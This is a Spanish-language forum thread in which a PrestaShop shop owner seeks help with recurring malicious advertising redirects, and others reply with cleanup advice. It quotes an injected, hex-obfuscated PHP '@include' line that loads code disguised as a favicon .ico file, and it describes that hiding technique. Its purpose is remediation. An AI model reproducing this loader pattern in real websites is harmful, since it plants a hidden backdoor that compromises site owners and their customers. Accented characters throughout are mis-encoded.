alex_aic Posted June 26, 2017 Share Posted June 26, 2017 (edited) Desde hace un tiempo a esta parte, nos encontramos con que tanto Wordpress como Prestashop, en la tienda de un cliente realiza redirecciones publicitarias ajenas a su empresa. Dichas redirecciones son aleatorias y las puedes encontrar en el fuente con un c贸digo similar a este: 聽 index.php (prestashop) /*dd2f1*/ @include "\x2fh\x6fm\***/\****\x77m\x78d\x70c\x2fp\****\x6ci\x63_\****\x6dl\x2ft\x69e\****\x61/\x6do\x64u\****\x73/\x62l\x6fc\****\x79a\x63c\x6fu\x6et\x66o\x6ft\x65r\x2ff\x61v\x69c\x6fn\x5f3\x667\x637\x63.\x69c\x6f"; /*dd2f1*/ Una vez limpias los ficheros que contienen dicha cadena, al cabo del tiempo vuelve a aparecer. Hemos cambiado incluso de hosting, con claves y usuarios nuevos tanto en base de datos como FTP pero sigue sucediendo. 驴Alguna idea? 聽 He editado el contenido del include, porque al desencriptarlo me ha sacado una ruta desde el ra铆z hasta un fichero .ico que os comento en una respuesta pr贸xima. Edited June 26, 2017 by alex_aic (see edit history) Link to comment Share on other sites More sharing options...
Enrique G贸mez Posted June 26, 2017 Share Posted June 26, 2017 Hola, por el foro hay varios casos similares al tuyo lo primero es mirar de localizar el agujero.. en la parte de worpdress no te puedo ayudar pero debes tener todo actualizado (sobretodo plugins...) 聽 En prestashop revisa este post para ver si estas en uno de esos casos https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/ 聽 P.ej si tiene el tema warehouse hab铆a varios m贸dulos incluidos que hay que actulizar. Tambi茅n el attribute wizard pro y聽 otros m贸dulos.. 聽 Una vez localizado y aplicada la soluci贸n viene la parte mas tediosa ya que se te habr谩n metido hasta en la cocina..聽聽 Es decir puede haber modficaci贸n y creaci贸n de ficheros en cualquier punto, lo que quiere decir que como no tengas un backup limpio hay que buscar y limpiar cualquier c贸digo o fichero malicioso. 聽 El mismo autor de warehouse publico una guia para limpiar http://iqit-commerce.com/securityhotfix/. Esto sirve para cualquer web y se trata de usar patrones de b煤squeda para detectar ficheros modificados y ficheros an贸malos. Link to comment Share on other sites More sharing options...
ventura Posted June 26, 2017 Share Posted June 26, 2017 Si accedes a los archivos por ftp remoto (Filezilla, WinSCP...) revisa tambi茅n que los equipos desde los que accedas a estos archivos est茅n completamente limpios de rootkits o cualquier tipo de malware. Link to comment Share on other sites More sharing options...
alex_aic Posted June 26, 2017 Author Share Posted June 26, 2017 Buenas,聽 聽 Tengo Prestashop actualizado, no poseemos plugins excepto los propios que vienen con Prestashop y el theme es el que viene por defecto. Desde finales del a帽o pasado fue cuando empezamos a detectar esta historia. La instalaci贸n de ambos CMS la llevamos arrastrando desde 2014 con actualizaciones inclu铆das y sin problemas como os comentaba desde hace unos meses. Limpiamos manualmente los includes y poco despu茅s vuelven a aparecer, incluso llegando a desencriptar la cadena del include, apuntaba a un fichero .ico que en realidad conten铆a c贸digo y limpiamos el directorio y eliminamos todos los ficheros .ico sospechosos. A los d铆as, otra vez. As铆 que s铆, seguramente lo tendremos como comentas hasta en la cocina.聽 聽 Imagino que tendr铆amos que modificar claves de acceso FTP, realizar una instalaci贸n en limpio, pero claro, los ficheros como fotos o adjuntos podr铆amos volver a subirlos? Los antivirus convencionales no detectan nada ya que son script PHP con @include o similar y no van a detectar nada malo. Por otra parte, la base de datos se podr铆a rescatar? 驴Qu茅 tablas tendr铆amos que revisar? Tendr铆amos que conservar hist贸rico de pedidos, pedidos en curso (carritos) y dem谩s, art铆culos,... M谩s que nada para no tener que iniciar todo desde cero. Link to comment Share on other sites More sharing options...
alex_aic Posted June 26, 2017 Author Share Posted June 26, 2017 Os adjunto el resultado de desencriptar el include. Apuntaba a ese fichero .ico Link to comment Share on other sites More sharing options...
alex_aic Posted June 26, 2017 Author Share Posted June 26, 2017 Os adjunto el fichero favicon_3F7C7C.ico que al cambiarle la extensi贸n a PHP resulta ser un script. favicon_3f7c7c.php Link to comment Share on other sites More sharing options...
alex_aic Posted June 28, 2017 Author Share Posted June 28, 2017 Al final no me qued贸 m谩s remedio que: Limpiar manualmente todos los archivos, descargando todo el proyecto a local y buscando cadenas de texto en todo el proyecto Una vez limpio, resubirlo al sitio pero no sin antes cambiar las claves de base de datos, ftp y dashboard En principio actualmente est谩 todo limpio, hemos contratado un servicio de siteLocker para que nos haga una auditoria durante este mes para verificar que todo anda ok y por el momento funciona todo bien Una faena interesante. La instalaci贸n era toda "default", sin theme, sin plugins excepto el de la pasarela de pagos que nos lo facilit贸 el banco, y en fin... Hemos tenido mala suerte. Copias de seguridad muy recomendables. (En casa del herrero,...) Link to comment Share on other sites More sharing options...
LieBM Posted July 21, 2018 Share Posted July 21, 2018 Buenas, hemos desarrollado una herramienta para poder buscar cualquier tipo de contenido, archivo, etc.. dentro del directorio donde se instale el script.聽 En los resultados de b煤squeda, se muestra la ruta del archivo, la l铆nea donde se encuentra el contenido encontrado y dem谩s informaci贸n. Con este sistema se podr谩 encontrar c贸digo malicioso o restos de c贸digo hackeado y hacer la limpieza de forma segura y r谩pida. https://www.liewebs.com/search-tool-pro-herramienta-buscador/ 聽 Saludos. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now